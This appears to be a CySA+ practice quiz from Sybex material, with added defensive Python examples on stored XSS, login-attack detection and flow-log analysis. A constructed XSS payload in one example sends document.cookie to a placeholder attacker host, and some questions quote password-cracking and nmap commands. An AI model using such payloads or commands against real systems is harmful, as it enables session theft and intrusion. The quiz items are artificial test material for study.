Title of test:
Cysa + Sybex

Description:
Chapter 1, questions 100-308, part 2

Author:
Adrian B

Creation Date:
15/05/2023

Category:
Computers

Number of questions: 55
Content:
1. Olivia is considering potential sources for threat intelligence information that she might incorporate into her security program. Which one of the following sources is most likely to be available without a subscription fee? A. Vulnerability feeds B. Open source C. Closed source D. Proprietary.
During a port scan of her network, Cynthia discovers a workstation that shows the following ports open. What should her next action be? A. Determine the reason for the ports being open. B. Investigate the potentially compromised workstation. C. Run a vulnerability scan to identify vulnerable services. D. Reenable the workstation’s local host firewall.
Charles is working with leaders of his organization to determine the types of information that should be gathered in his new threat intelligence program. In what phase of the intelligence cycle is he participating? A. Dissemination B. Feedback C. Analysis D. Requirements.
What term is used to describe the groups of related organizations who pool resources to share cybersecurity threat information and analyses? A. SOC B. ISAC C. CERT D. CIRT.
Singh incorporated the Cisco Talos tool into his organization’s threat intelligence program. He uses it to automatically look up information about the past activity of IP addresses sending email to his mail servers. What term best describes this intelligence source? A. Open source B. Behavioral C. Reputational D. Indicator of compromise.
Jamal is assessing the risk to his organization from their planned use of AWS Lambda, a serverless computing service that allows developers to write code and execute functions directly on the cloud platform. What cloud tier best describes this service? A. SaaS B. PaaS C. IaaS D. FaaS.
Alfonzo is an IT professional at a Portuguese university who is creating a cloud environment for use only by other Portuguese universities. What type of cloud deployment model is he using? A. Public cloud B. Private cloud C. Hybrid cloud D. Community cloud.
While gathering reconnaissance data for a penetration test, Charlene uses the MXToolbox MX Lookup tool. What can she determine from the response to her query shown here? A. The mail servers are blacklisted. B. The mail servers have failed an SMTP test. C. The mail servers are clustered. D. There are two MX hosts listed in DNS.
Alex wants to scan a protected network and has gained access to a system that can communicate to both his scanning system and the internal network, as shown in the image here. What type of nmap scan should Alex conduct to leverage this host if he cannot install nmap on system A? A. A reflection scan B. A proxy scan C. A randomized host scan D. A ping-through scan.
Lucy recently detected a cross-site scripting vulnerability in her organization’s web server. The organization operates a support forum where users can enter HTML tags and the resulting code is displayed to other site visitors. What type of cross-site scripting vulnerability did Lucy discover? A. Persistent B. Reflected C. DOM-based D. Blind.
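The forum in the question above stores whatever HTML a user submits and serves it back to every later visitor, which is what makes the flaw persistent (stored) rather than reflected. The following is an added example, not code from the quiz or the Sybex book: a minimal post store rendered once without and once with output encoding. All posts, the attacker host and the payload are constructed placeholders.

```python
"""Added example: a stored (persistent) XSS in a toy support forum and the
output-encoding fix. Everything here is constructed for illustration."""
import html


class Forum:
    """Stores posts server-side and renders them into a thread page."""

    def __init__(self, escape_output):
        self.posts = []
        self.escape_output = escape_output

    def submit(self, author, body):
        # The body is persisted exactly as submitted; nothing is validated on input.
        self.posts.append((author, body))

    def render(self):
        rows = []
        for author, body in self.posts:
            if self.escape_output:
                # Encode on output so stored markup is shown as text, not parsed.
                author = html.escape(author, quote=True)
                body = html.escape(body, quote=True)
            rows.append(f"<li><b>{author}</b>: {body}</li>")
        return "<ul>" + "".join(rows) + "</ul>"


# Constructed attacker post; attacker.example is a placeholder host.
PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'


def payload_executes(page):
    """A browser would run the payload only if the raw <script> tag survives."""
    return "<script>" in page


def demo():
    """Render the same thread from a vulnerable and a hardened forum."""
    results = {}
    for label, escape in (("vulnerable", False), ("hardened", True)):
        forum = Forum(escape_output=escape)
        forum.submit("mallory", PAYLOAD)
        forum.submit("alice", "How do I reset my password?")
        page = forum.render()  # this page is served to every later visitor
        results[label] = payload_executes(page)
    return results


if __name__ == "__main__":
    print(demo())
```

If the forum genuinely needs to allow a subset of tags (bold, links), escaping everything is not an option; the fix is then an allowlist HTML sanitizer on output, never a denylist of "dangerous" tags.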
Florian discovered a vulnerability in a proprietary application developed by his organization. The application performs memory management using the malloc() function and one area of memory allocated in this manner has an overflow vulnerability. What term best describes this overflow? A. Buffer overflow B. Stack overflow C. Integer overflow D. Heap overflow.
Geoff is reviewing logs and sees a large number of attempts to authenticate to his VPN server using many different username and password combinations. The same usernames are attempted several hundred times before moving on to the next one. What type of attack is most likely taking place? A. Credential stuffing B. Password spraying C. Brute-force D. Rainbow table.
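What distinguishes the attacks in the question above is the shape of the failures: brute force hammers one account with many passwords, while spraying and stuffing touch many accounts a few times each. The following is an added example, not code from the quiz or the Sybex book: detection logic run over constructed VPN failure lines. The log layout in LINE_RE is an assumption; adapt it to the real appliance's format.

```python
"""Added example: classify bursts of failed VPN logins by source IP as
brute force versus a password spray / credential stuffing pattern.
The log lines are constructed and their layout is an assumption."""
import re
from collections import Counter, defaultdict

# Assumed line layout: "<timestamp> vpn auth-fail user=<name> src=<ip>"
LINE_RE = re.compile(r"^\S+ vpn auth-fail user=(?P<user>\S+) src=(?P<src>\S+)$")


def parse(lines):
    """Return {src_ip: Counter(user -> failure count)} for every parseable line."""
    by_src = defaultdict(Counter)
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            by_src[m["src"]][m["user"]] += 1
    return by_src


def classify(lines, brute_per_user=100, spray_min_users=20, spray_max_per_user=5):
    """Label each source IP by the shape of its failures.

    brute force    : one account fails hundreds of times (many passwords, one user)
    spray/stuffing : many accounts each fail only a few times
    The log line carries no password, so spraying (one password reused across
    users) cannot be told apart from stuffing (breached user:password pairs)
    from this data alone; both get the same label and the same response.
    """
    verdicts = {}
    for src, per_user in parse(lines).items():
        if per_user.most_common(1)[0][1] >= brute_per_user:
            verdicts[src] = "brute force"
        elif len(per_user) >= spray_min_users and max(per_user.values()) <= spray_max_per_user:
            verdicts[src] = "password spraying / credential stuffing"
        else:
            verdicts[src] = "undetermined"
    return verdicts


def make_sample():
    """Constructed failures: one source hammers three accounts 300 times each,
    another tries 40 accounts twice each, a third fails once."""
    lines = []
    for user in ("alice", "bob", "carol"):
        lines += [f"2019-07-11T04:58:{i % 60:02d} vpn auth-fail user={user} src=203.0.113.5"
                  for i in range(300)]
    for n in range(40):
        lines += [f"2019-07-11T05:00:{i:02d} vpn auth-fail user=user{n:02d} src=198.51.100.9"
                  for i in range(2)]
    lines.append("2019-07-11T05:01:00 vpn auth-fail user=dave src=192.0.2.7")
    return lines


if __name__ == "__main__":
    for src, verdict in classify(make_sample()).items():
        print(f"{src:<14} {verdict}")
```

The thresholds are starting points; a lockout policy that fires after a handful of failures per account will stop the brute-force pattern but not the spray, which is why spray detection has to key on the number of distinct accounts per source rather than failures per account.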
The company that Dan works for has recently migrated to an SaaS provider for its enterprise resource planning (ERP) software. In its traditional on-site ERP environment, Dan conducted regular port scans to help with security validation for the systems. What will Dan most likely have to do in this new environment? A. Use a different scanning tool. B. Rely on vendor testing and audits. C. Engage a third-party tester. D. Use a VPN to scan inside the vendor’s security perimeter.
Matthew is analyzing some code written in the C programming language and discovers that it is using the functions listed here. Which of these functions poses the greatest security vulnerability? A. strcpy() B. main() C. printf() D. scanf().
Azra believes that one of her users may be taking malicious action on the systems she has access to. When she walks past her user’s desktop, she sees the following command on the screen: user12@workstation:/home/user12# ./john -wordfile:/home/user12/mylist.txt -format:lm hash.txt What is the user attempting to do? A. They are attempting to hash a file. B. They are attempting to crack hashed passwords. C. They are attempting to crack encrypted passwords. D. They are attempting a pass-the-hash attack.
While conducting reconnaissance of his own organization, Ian discovers that multiple certificates are self-signed. What issue should he report to his management? A. Self-signed certificates do not provide secure encryption for site visitors. B. Self-signed certificates can be revoked only by the original creator. C. Self-signed certificates will cause warnings or error messages. D. None of the above.
Carrie needs to lock down a Windows workstation that has recently been scanned using nmap with the results shown here. She knows that the workstation needs to access websites and that the system is part of a Windows domain. What ports should she allow through the system’s firewall for externally initiated connections? A. 80, 135, 139, and 445 B. 80, 445, and 3389 C. 135, 139, and 445 D. No ports should be open.
While conducting reconnaissance, Piper discovers what she believes is an SMTP service running on an alternate port. What technique should she use to manually validate her guess? A. Send an email via the open port. B. Send an SMTP probe. C. Telnet to the port. D. SSH to the port.
What two pieces of information does nmap need to estimate network path distance? A. IP address and TTL B. TTL and operating system C. Operating system and BGP flags D. TCP flags and IP address.
Marta is a security analyst who has been tasked with performing nmap scans of her organization’s network. She is a new hire and has been given this logical diagram of the organization’s network but has not been provided with any additional detail. Marta wants to determine what IP addresses to scan from location A. How can she find this information? A. Scan the organization’s web server and then scan the other 255 IP addresses in its subnet. B. Query DNS and WHOIS to find her organization’s registered hosts. C. Contact ICANN to request the data. D. Use traceroute to identify the network that the organization’s domain resides in.
Chris wants to gather as much information as he can about an organization using DNS harvesting techniques. Which of the following methods will most easily provide the most useful information if they are all possible to conduct on the network he is targeting? A. DNS record enumeration B. Zone transfer C. Reverse lookup D. Domain brute-forcing.
While gathering DNS information about an organization, Ryan discovered multiple AAAA records. What type of reconnaissance does this mean Ryan may want to consider? A. Second-level DNS queries B. IPv6 scans C. Cross-domain resolution D. A CNAME verification.
When Scott performs an nmap scan with the -T flag set to 5, what variable is he changing? A. How fast the scan runs B. The TCP timeout flag it will set C. How many retries it will perform D. How long the scan will take to start up.
While application vulnerability scanning one of her target organization’s web servers, Andrea notices that the server’s hostname is resolving to a cloudflare.com host. What does Andrea know about her scan? A. It is being treated like a DDoS attack. B. It is scanning a CDN-hosted copy of the site. C. It will not return useful information. D. She cannot determine anything about the site based on this information.
While tracking a potential APT on her network, Cynthia discovers a network flow for her company’s central file server. What does this flow entry most likely show if 10.2.2.3 is not a system on her network?
Date flow start          Duration  Proto  Src IP Addr:Port->Dst IP Addr:Port  Packets  Bytes  Flows
2017-07-11 13:06:46.343  21601804  TCP    10.1.1.1:1151->10.2.2.3:443         9473640  9.1 G  1
2017-07-11 13:06:46.551  21601804  TCP    10.2.2.3:443->10.1.1.1:1151         8345101  514 M  1
A. A web browsing session B. Data exfiltration C. Data infiltration D. A vulnerability scan.
Lauren wants to identify all the printers on the subnets she is scanning with nmap. Which of the following nmap commands will not provide her with a list of likely printers? A. nmap -sS -p 9100,515,631 10.0.10.15/22 -oX printers.txt B. nmap -O 10.0.10.15/22 -oG - | grep printer >> printers.txt C. nmap -sU -p 9100,515,631 10.0.10.15/22 -oX printers.txt D. nmap -sS -O 10.0.10.15/22 -oG | grep >> printers.txt.
Chris knows that systems have connected to a remote host on TCP ports 1433 and 1434. If he has no other data, what should his best guess be about what the host is? A. A print server B. A Microsoft SQL server C. A MySQL server D. A secure web server running on an alternate port.
While conducting a topology scan of a remote web server, Susan notes that the IP addresses returned for the same DNS entry change over time. What has she likely encountered? A. A route change B. Fast-flux DNS C. A load balancer D. An IP mismatch.
Kwame is reviewing his team’s work as part of a reconnaissance effort and is checking Wireshark packet captures. His team reported no open ports on 10.0.2.15. What issue should he identify with their scan based on the capture shown here? A. The host was not up. B. Not all ports were scanned. C. The scan scanned only UDP ports. D. The scan was not run as root.
Nihar wants to conduct an nmap scan of a firewalled subnet. Which of the following is not an nmap firewall evasion technique he could use? A. Fragmenting packets B. Changing packet header flags C. Spoofing the source IP D. Appending random data.
Aidan operates the point-of-sale network for a company that accepts credit cards and is thus required to be compliant with PCI DSS. During his regular assessment of the point-of-sale terminals, he discovers that a recent Windows operating system vulnerability exists on all of them. Since they are all embedded systems that require a manufacturer update, he knows that he cannot install the available patch. What is Aidan’s best option to stay compliant with PCI DSS and protect his vulnerable systems? A. Replace the Windows embedded point-of-sale terminals with standard Windows systems. B. Build a custom operating system image that includes the patch. C. Identify, implement, and document compensating controls. D. Remove the POS terminals from the network until the vendor releases a patch.
Amir’s remote scans of a target organization’s class C network block using nmap (nmap -sS 10.0.10.1/24) show only a single web server. If Amir needs to gather additional reconnaissance information about the organization’s network, which of the following scanning techniques is most likely to provide additional detail? A. Use a UDP scan. B. Perform a scan from on-site. C. Scan using the -p 1-65535 flag. D. Use nmap’s IPS evasion techniques.
As part of his active reconnaissance activities, Frank is provided with a shell account accessible via SSH. If Frank wants to run a default nmap scan on the network behind the firewall shown here, how can he accomplish this? A. ssh -t 192.168.34.11 nmap 192.168.34.0/24 B. ssh -R 8080:192.168.34.11:8080 [remote account:remote password] C. ssh -proxy 192.168.11 [remote account:remote password] D. Frank cannot scan multiple ports with a single ssh command.
Rick is reviewing flows of a system on his network and discovers the following flow logs. What is the system doing? (In the Dst port column, 8.0 is the ICMP "Echo request" type/code.)
Date flow start          Duration  Proto  Src IP Addr:Port->Dst IP Addr:Port  Packets  Bytes  Flows
2019-07-11 04:58:59.518  10.000    ICMP   10.1.1.1:0->10.2.2.6:8.0            11       924    1
2019-07-11 04:58:59.518  10.000    ICMP   10.2.2.6:0->10.1.1.1:0.0            11       924    1
2019-07-11 04:58:59.518  10.000    ICMP   10.1.1.1:0->10.2.2.7:8.0            11       924    1
2019-07-11 04:58:59.518  10.000    ICMP   10.2.2.7:0->10.1.1.1:0.0            11       924    1
2019-07-11 04:58:59.518  10.000    ICMP   10.1.1.1:0->10.2.2.8:8.0            11       924    1
2019-07-11 04:58:59.518  10.000    ICMP   10.2.2.8:0->10.1.1.1:0.0            11       924    1
2019-07-11 04:58:59.518  10.000    ICMP   10.1.1.1:0->10.2.2.9:8.0            11       924    1
2019-07-11 04:58:59.518  10.000    ICMP   10.2.2.9:0->10.1.1.1:0.0            11       924    1
2019-07-11 04:58:59.518  10.000    ICMP   10.1.1.1:0->10.2.2.10:8.0           11       924    1
2019-07-11 04:58:59.518  10.000    ICMP   10.2.2.10:0->10.1.1.1:0.0           11       924    1
2019-07-11 04:58:59.518  10.000    ICMP   10.1.1.1:0->10.2.2.6:11.0           11       924    1
2019-07-11 04:58:59.518  10.000    ICMP   10.2.2.11:0->10.1.1.1:0.0           11       924    1
A. A port scan B. A failed three-way handshake C. A ping sweep D. A traceroute.
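Both the file-server flow question (Cynthia, 10.2.2.3) and the ICMP flow question above (Rick) are answered by reading nfdump-style records the same way: compare bytes sent with bytes received per conversation, and count how many distinct hosts one source sends echo requests to. The following is an added example, not code from the quiz or the Sybex book, that parses records in that layout and applies both checks. The records are constructed to match the format shown on the page, and treating 10.1.0.0/16 as the internal network is an assumption.

```python
"""Added example: parse nfdump-style flow records and flag (a) conversations
where an internal host sends far more than it receives and (b) sources
sending ICMP echo requests to many hosts. Records are constructed; the
internal network is an assumption."""
import ipaddress
import re
from collections import defaultdict

FLOW_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+)\s+(?P<dur>[\d.]+)\s+(?P<proto>\w+)\s+"
    r"(?P<src>[\d.]+):(?P<sport>[\d.]+)->(?P<dst>[\d.]+):(?P<dport>[\d.]+)\s+"
    r"(?P<pkts>\d+)\s+(?P<bytes>[\d.]+)(?:\s*(?P<unit>[KMG]))?\s+(?P<flows>\d+)$"
)
UNIT = {None: 1, "K": 1_000, "M": 1_000_000, "G": 1_000_000_000}


def parse_flows(text):
    """Return one dict per record; K/M/G byte suffixes are expanded to integers."""
    flows = []
    for line in text.strip().splitlines():
        m = FLOW_RE.match(line.strip())
        if not m:
            continue  # header line or unparseable record
        d = m.groupdict()
        d["bytes"] = int(float(d["bytes"]) * UNIT[d.pop("unit")])
        d["pkts"] = int(d["pkts"])
        flows.append(d)
    return flows


def exfil_candidates(flows, internal=ipaddress.ip_network("10.1.0.0/16"),
                     min_out_bytes=1_000_000_000, min_ratio=5.0):
    """Pair each internal->external TCP/UDP flow with its reverse direction and
    flag those where the internal side sends far more than it receives.
    A browsing session looks the other way round: small requests, large replies."""
    out_bytes, in_bytes = defaultdict(int), defaultdict(int)
    for f in flows:
        if f["proto"] == "ICMP":
            continue
        src_in = ipaddress.ip_address(f["src"]) in internal
        dst_in = ipaddress.ip_address(f["dst"]) in internal
        if src_in and not dst_in:
            out_bytes[(f["src"], f["dst"], f["dport"])] += f["bytes"]
        elif dst_in and not src_in:
            in_bytes[(f["dst"], f["src"], f["sport"])] += f["bytes"]
    flagged = []
    for key, sent in out_bytes.items():
        received = in_bytes.get(key, 0)
        if sent >= min_out_bytes and sent >= min_ratio * max(received, 1):
            flagged.append((key[0], key[1], sent, received))
    return flagged


def ping_sweep_sources(flows, min_targets=5):
    """ICMP type 8 code 0 (shown as dport 8.0) is an echo request; one source
    sending echo requests to many distinct hosts in one window is a sweep."""
    targets = defaultdict(set)
    for f in flows:
        if f["proto"] == "ICMP" and f["dport"] == "8.0":
            targets[f["src"]].add(f["dst"])
    return {src: sorted(t) for src, t in targets.items() if len(t) >= min_targets}


# Constructed records laid out like the nfdump output quoted in the questions;
# the last two lines are an ordinary HTTPS fetch added for contrast.
EXFIL_SAMPLE = """
Date flow start         Duration  Proto  Src IP Addr:Port->Dst IP Addr:Port  Packets  Bytes  Flows
2017-07-11 13:06:46.343 21601804 TCP 10.1.1.1:1151->10.2.2.3:443 9473640 9.1 G 1
2017-07-11 13:06:46.551 21601804 TCP 10.2.2.3:443->10.1.1.1:1151 8345101 514 M 1
2017-07-11 13:07:02.101 12.500 TCP 10.1.1.9:50233->10.2.2.3:443 412 61 K 1
2017-07-11 13:07:02.120 12.500 TCP 10.2.2.3:443->10.1.1.9:50233 1390 1.8 M 1
"""
SWEEP_SAMPLE = "\n".join(
    f"2019-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.{h}:8.0 11 924 1\n"
    f"2019-07-11 04:58:59.518 10.000 ICMP 10.2.2.{h}:0->10.1.1.1:0.0 11 924 1"
    for h in range(6, 12)
)

if __name__ == "__main__":
    print(exfil_candidates(parse_flows(EXFIL_SAMPLE)))
    print(ping_sweep_sources(parse_flows(SWEEP_SAMPLE)))
```

The long duration in the first record matters as much as the byte ratio: a multi-hour TCP session from a file server to an unknown host on 443, sending roughly 18 times what it receives, is a transfer out, not browsing. Conversely, a sweep shows one request/reply pair per target with identical sizes, which is what separates it from a port scan against a single host.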
Ryan’s passive reconnaissance efforts resulted in the following packet capture. Which of the following statements cannot be verified based on the packet capture shown for the host with IP address 10.0.2.4? A. The host does not have a DNS entry. B. It is running a service on port 139. C. It is running a service on port 445. D. It is a Windows system.
In what type of attack does the adversary leverage a position on a guest operating system to gain access to hardware resources assigned to other operating systems running in the same hardware environment? A. Buffer overflow B. Directory traversal C. VM escape D. Cross-site scripting.
Vic scanned a Windows server used in his organization and found the result shown here. The server is on an internal network with access limited to IT staff and is not part of a domain. How urgently should Vic remediate this vulnerability? A. Vic should drop everything and remediate this vulnerability immediately. B. While Vic does not need to drop everything, this vulnerability requires urgent attention and should be addressed quickly. C. This is a moderate vulnerability that can be scheduled for remediation at a convenient time. D. This vulnerability is informational in nature and may be left in place.
Wendy is the security administrator for a membership association that is planning to launch an online store. As part of this launch, she will become responsible for ensuring that the website and associated systems are compliant with all relevant standards. What regulatory regime specifically covers credit card information? A. PCI DSS B. FERPA C. HIPAA D. SOX.
Harold is preparing to correct the vulnerability. What service should he inspect to identify the issue? A. SSH B. HTTPS C. RDP D. SFTP.
What priority should Stella place on remediating this vulnerability? A. Stella should make this vulnerability one of her highest priorities. B. Stella should remediate this vulnerability within the next several weeks. C. Stella should remediate this vulnerability within the next several months. D. Stella does not need to assign any priority to remediating this vulnerability.
Natalie ran a vulnerability scan of a web application recently deployed by her organization, and the scan result reported a blind SQL injection. She reported the vulnerability to the developers, who scoured the application and made a few modifications but did not see any evidence that this attack was possible. Natalie reran the scan and received the same result. The developers are now insisting that their code is secure. What is the most likely scenario? A. The result is a false positive. B. The code is deficient and requires correction. C. The vulnerability is in a different web application running on the same server. D. Natalie is misreading the scan report.
Joe is conducting a network vulnerability scan against his datacenter and receives reports from system administrators that the scans are slowing down their systems. There are no network connectivity issues, only performance problems on individual hosts. He looks at the scan settings shown here. Which setting would be most likely to correct the problem? A. Scan IP addresses in a random order B. Network timeout (in seconds) C. Max simultaneous checks per host D. Max simultaneous hosts per scan.
Laura is working to upgrade her organization’s vulnerability management program. She would like to add technology that is capable of retrieving the configurations of systems, even when they are highly secured. Many systems use local authentication, and she wants to avoid the burden of maintaining accounts on all of those systems. What technology should Laura consider to meet her requirement? A. Credentialed scanning B. Uncredentialed scanning C. Server-based scanning D. Agent-based scanning.
Ryan will not be able to correct the vulnerability for several days. In the meantime, he would like to configure his intrusion prevention system to watch for issues related to this vulnerability. Which one of the following protocols would an attacker use to exploit this vulnerability? A. SSH B. HTTPS C. FTP D. RDP.
Which one of the following actions could Ryan take to remediate the underlying issue without disrupting business activity? A. Disable the IIS service. B. Apply a security patch. C. Modify the web application. D. Apply IPS rules.
If an attacker is able to exploit this vulnerability, what is the probable result that will have the highest impact on the organization? A. Administrative control of the server B. Complete control of the domain C. Access to configuration information D. Access to web application logs.
Ted is configuring vulnerability scanning for a file server on his company’s internal network. The server is positioned on the network as shown here. What types of vulnerability scans should Ted perform to balance the efficiency of scanning effort with expected results? A. Ted should not perform scans of servers on the internal network. B. Ted should only perform internal vulnerability scans. C. Ted should only perform external vulnerability scans. D. Ted should perform both internal and external vulnerability scans.
Ji-won recently restarted an old vulnerability scanner that had not been used in more than a year. She booted the scanner, logged in, and configured a scan to run. After reading the scan results, she found that the scanner was not detecting known vulnerabilities that were detected by other scanners. What is the most likely cause of this issue? A. The scanner is running on an outdated operating system. B. The scanner’s maintenance subscription is expired. C. Ji-won has invalid credentials on the scanner. D. The scanner does not have a current, valid IP address.
After reviewing the results of a vulnerability scan, Gabriella discovered a flaw in her Oracle database server that may allow an attacker to attempt a direct connection to the server. She would like to review NetFlow logs to determine what systems have connected to the server recently. What TCP port should Gabriella expect to find used for this communication? A. 443 B. 1433 C. 1521 D. 8080.
During a vulnerability scan, Patrick discovered that the configuration management agent installed on all of his organization’s Windows servers contains a serious vulnerability. The manufacturer is aware of this issue, and a patch is available. What process should Patrick follow to correct this issue? A. Immediately deploy the patch to all affected systems. B. Deploy the patch to a single production server for testing and then deploy to all servers if that test is successful. C. Deploy the patch in a test environment and then conduct a staged rollout in production. D. Disable all external access to systems until the patch is deployed.
Brian is considering the use of several different categories of vulnerability plug-ins. Of the types listed here, which is the most likely to result in false positive reports? A. Registry inspection B. Banner grabbing C. Service interrogation D. Fuzzing.
Which one of the following is not an appropriate criterion to use when prioritizing the remediation of vulnerabilities? A. Network exposure of the affected system B. Difficulty of remediation C. Severity of the vulnerability D. All of these are appropriate.
Larry recently discovered a critical vulnerability in one of his organization’s database servers during a routine vulnerability scan. When he showed the report to a database administrator, the administrator responded that they had corrected the vulnerability by using a vendor-supplied workaround because upgrading the database would disrupt an important process. Larry verified that the workaround is in place and corrects the vulnerability. How should Larry respond to this situation? A. Mark the report as a false positive. B. Insist that the administrator apply the vendor patch. C. Mark the report as an exception. D. Require that the administrator submit a report describing the workaround after each vulnerability scan.
Larry recently discovered a critical vulnerability in one of his organization’s database servers during a routine vulnerability scan. When he showed the report to a database administrator, the administrator responded that they had corrected the vulnerability by using a vendor-supplied workaround because upgrading the database would disrupt an important process. Larry verified that the workaround is in place and corrects the vulnerability. What is the most likely cause of this report? A. The vulnerability scanner requires an update. B. The vulnerability scanner depends on version detection. C. The database administrator incorrectly applied the workaround. D. Larry misconfigured the scan.
Margot discovered that a server in her organization has a SQL injection vulnerability. She would like to investigate whether attackers have attempted to exploit this vulnerability. Which one of the following data sources is least likely to provide helpful information? A. NetFlow logs B. Web server logs C. Database logs D. IDS logs.